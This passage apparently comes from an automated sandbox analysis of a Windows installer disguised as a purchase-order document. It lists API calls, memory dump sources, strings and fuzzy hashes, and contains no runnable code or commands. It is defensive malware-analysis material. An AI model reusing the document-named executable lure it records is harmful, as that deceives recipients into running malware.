                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 004059FF
                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A11
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405A18
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A1F
                                                                                                                                                                  • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,80000000,00000003), ref: 00405829
                                                                                                                                                                  • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                • API String ID: 3756836283-4148678300
                                                                                                                                                                • Opcode ID: 624728a16f041d5ab8a4dfe5a1be018cc08b908fa827cbe652aff8f36f69eba2
                                                                                                                                                                • Instruction ID: 703081f9f45e0959c07b6a00457515c8324f77790511a56e8ac0345a7c84fdf8
                                                                                                                                                                • Opcode Fuzzy Hash: 624728a16f041d5ab8a4dfe5a1be018cc08b908fa827cbe652aff8f36f69eba2
                                                                                                                                                                • Instruction Fuzzy Hash: 91412B71B04705AFD2206B249C49F6B7B6CEF89754F14053AFD01F62D2D678A8008EBD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 100023D2
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                                                                                                                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002417
                                                                                                                                                                  • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 1000248E
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100024B7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2278267121-0
                                                                                                                                                                • Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                                                                                                                                                • Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
                                                                                                                                                                • Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                                                                                                                                                • Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405E3A
                                                                                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                                                                                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405E4C
                                                                                                                                                                • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405E5C
                                                                                                                                                                Strings
                                                                                                                                                                • *?|<>/":, xrefs: 00405E2A
                                                                                                                                                                • "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", xrefs: 00405E1E
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE3, 00405DE8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 589700163-3267566274
                                                                                                                                                                • Opcode ID: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                                                                                                                                                • Instruction ID: 982ed4f0ea0d1ffb3a75412ce8e95c0ea6245537b44222f6b90d7ae264b7a878
                                                                                                                                                                • Opcode Fuzzy Hash: 2024885374f02dac88d9fb103eccae40028a2ab1d30660e2dcec4d8ea4488381
                                                                                                                                                                • Instruction Fuzzy Hash: 7511B671804B9129EB3217248C44B776F98CB9A7A0F18047BE5C5723C2C67C5E828EED
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 00403F0B
                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403F27
                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403F33
                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403F3F
                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403F52
                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403F62
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403F7C
                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403F86
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                                                • Instruction ID: 43f1f9eadd2e023582460ec461a07703dc87d5103ca70cdaf59bc9c3c4c10c95
                                                                                                                                                                • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                                                • Instruction Fuzzy Hash: B1219971904705AFC7219F68DD08B5BBFF8AF01715F04852AF995E22D1C378E944CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 10002264
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000228E
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022B2
                                                                                                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100022C6
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100022FD
                                                                                                                                                                  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3955009414-0
                                                                                                                                                                • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                                                                                                • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                                                                                                                                                • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                                                                                                • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                                                                                                                                                • MulDiv.KERNEL32(000BBABC,00000064,000BC4F8), ref: 00402B92
                                                                                                                                                                • wsprintfA.USER32 ref: 00402BA2
                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                                                                                                                                                Strings
                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402B9C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                • Opcode ID: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                                                                                                                                                • Instruction ID: 338c4dd4cc7a1f9a3f94f7e8e9aba01fa07f8a2d27e46d6da828e47d9d426f75
                                                                                                                                                                • Opcode Fuzzy Hash: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                                                                                                                                                • Instruction Fuzzy Hash: 32014F70540208ABEF249F61DD0AEAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • SetWindowTextA.USER32(00000000,007A1F00), ref: 0040397F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TextWindow
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$1033$Konkursbehandling Setup: Installing
                                                                                                                                                                • API String ID: 530164218-750998842
                                                                                                                                                                • Opcode ID: 70daa21561afbffaee6324691816ec535f2df065c97ff5b03bec79a516da71ec
                                                                                                                                                                • Instruction ID: 3eeb35b712935f7be9db67fea1ba5421606f6b55dcd8c4013f5d2095cba695b6
                                                                                                                                                                • Opcode Fuzzy Hash: 70daa21561afbffaee6324691816ec535f2df065c97ff5b03bec79a516da71ec
                                                                                                                                                                • Instruction Fuzzy Hash: 121108B1B046009BC721AF19CC809333BADEBC6756318823FED01673A1D77D9D028B68
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 0040562A
                                                                                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76DC3410,0040329C), ref: 00405633
                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014), ref: 00405644
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405624
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                                                                                                                                • Instruction ID: 00b6ae861ddc274f1a22631493032202eb54a79e67bc778d52c9d7871f0e19dd
                                                                                                                                                                • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                                                                                                                                • Instruction Fuzzy Hash: C8D0A962A099302ED20226158C05EDB3A98CF02315B040873F200B22E2C67C2D418BFE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,76DC3410,00405474,?,C:\Users\user\AppData\Local\Temp\,76DC3410,00000000), ref: 004056CB
                                                                                                                                                                • CharNextA.USER32(00000000), ref: 004056D0
                                                                                                                                                                • CharNextA.USER32(00000000), ref: 004056E4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                • String ID: outvillain\faber.div
                                                                                                                                                                • API String ID: 3213498283-1876387199
                                                                                                                                                                • Opcode ID: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                                                                                                                                                • Instruction ID: d8a7812ab63b142c46357df6d68c050b156b7c96d32b59c6f1bc793f3f64125f
                                                                                                                                                                • Opcode Fuzzy Hash: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                                                                                                                                                • Instruction Fuzzy Hash: 86F0C251905F91AAFB3252640C44B7B9BCCDB55315F041467E641672C1C2BD4C405F9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402C00
                                                                                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
